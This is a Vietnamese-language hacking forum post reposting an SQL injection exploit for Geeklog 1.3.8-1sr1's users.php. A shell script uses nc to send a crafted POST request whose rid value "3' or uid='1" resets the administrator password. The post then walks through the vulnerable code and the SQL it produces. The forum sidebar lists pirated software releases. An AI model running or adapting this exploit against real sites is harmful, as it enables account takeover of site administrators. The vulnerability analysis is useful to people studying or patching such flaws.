Search
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» NewBlueFx TotalFX Windows-FL | 1.11 GB
Tue Dec 17, 2013 12:42 pm by titquarra

» NewBlueFx TotalFX Windows-FL | 1.11 GB
Tue Dec 17, 2013 12:42 pm by titquarra

» Celebrity.Sex.Tape.UNCUT.&.UNRATED.2012.720p.BRrip.x264.YIFY.mp4
Tue Dec 17, 2013 8:32 am by titquarra

» Maya Autodesk Personal Learning Edition 8.5
Tue Dec 17, 2013 7:47 am by titquarra

» Tuyệt Kỹ Đong Giai Chân Kinh (tuyệt Kỹ cua trai)
Thu Aug 23, 2012 5:38 am by Admin

» Tuyệt kỹ cua giai
Thu Aug 23, 2012 5:36 am by Admin

» NETCAT.........
Mon Aug 13, 2012 6:35 am by Admin

» Bảo mật CSDL bằng phương pháp mã hóa.
Tue Apr 17, 2012 10:04 pm by Admin

» Hàm mã hóa MD5 bằng JavaScript
Tue Apr 17, 2012 10:03 pm by Admin

Shopmotion


Affiliates
free forum


Sql Injection Exploit Code

View previous topic View next topic Go down

Sql Injection Exploit Code

Post  Admin on Tue Dec 28, 2010 9:03 am

hack site Geeklog version 1.3.8-1sr1
Đôi nét về greedlog.net
http://www.geeklog.net/
Đây là một dạng portal download free dùng rất nhiều cho site tin tức vvvv khá phổ biến. Lỗi sql injection được tìm thấy trong file users.php
2.code khai thác

Exploit:
#!/bin/sh

echo "POST /path/to/gl/users.php HTTP/1.0
Content-length: 50
Content-type: application/x-www-form-urlencoded

mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&" | nc localhost 80

This should change the Admin user's password to "new". You have to change the /path/to/gl/users.php according to your Geeklog installation.

Immune systems:
* Geeklog version 1.3.8-1sr2

The below exploit uses the "forgot password" feature introduced in Geeklog 1.3.8. By constructing a certain kind of HTTP request, an attacker can change any user's Geeklog password, including the administrator password. This is because an SQL injection problem. In users.php we have this kind of code (line about 750):
if (!empty($uid) && is_numeric($uid) && !empty($reqid)) {
$valid = DB_count($_TABLES['users'], arrary('uid', 'pwrequestid'),
array($uid, $reqid));
if ($valid==1) {
// generate an md5 hash for the new password and change it
} else {
// invalid request, display error message
}
}

The database module layer hides the actual SQL queries and this does not look very clear yet, but if we log all SQL queries executed, we see that the above code produces this SQL (with e.g. $uid=2 and $reqid=3):
SELECT COUNT(*) FROM gl_users WHERE uid = '2' AND pwrequestid = '3'

The password is changed only if the count returned by this query is exactly one. The only check done for $reqid is that it is not empty. It can contain anything, so changing $reqid to e.g. "3' or uid='1" the SQL server will get this query instead:
SELECT COUNT(*) FROM gl_users
WHERE uid = '2' AND pwrequestid = '3' or uid='1'

The pwrequestid = '3' condition is false unless the admin user really forgot the password and uses this feature at the same time (very unlikely). However, because of the "or uid='1'" part, the query will still return one, because a user with uid=1 exists (the Anonymous user). So, the $valid variable in the above code is set to one and the password is changed.

This of course has nothing to do with displaying error messages. The exploit does not produce any error message because the SQL code above is correct.

Jouko has informed Geeklog developers about this and they have released a fixed version, see http://www.geeklog.net/.

Admin
Admin

Tổng số bài gửi : 782
Join date : 2009-08-15

View user profile http://hackis.forumotion.com

Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum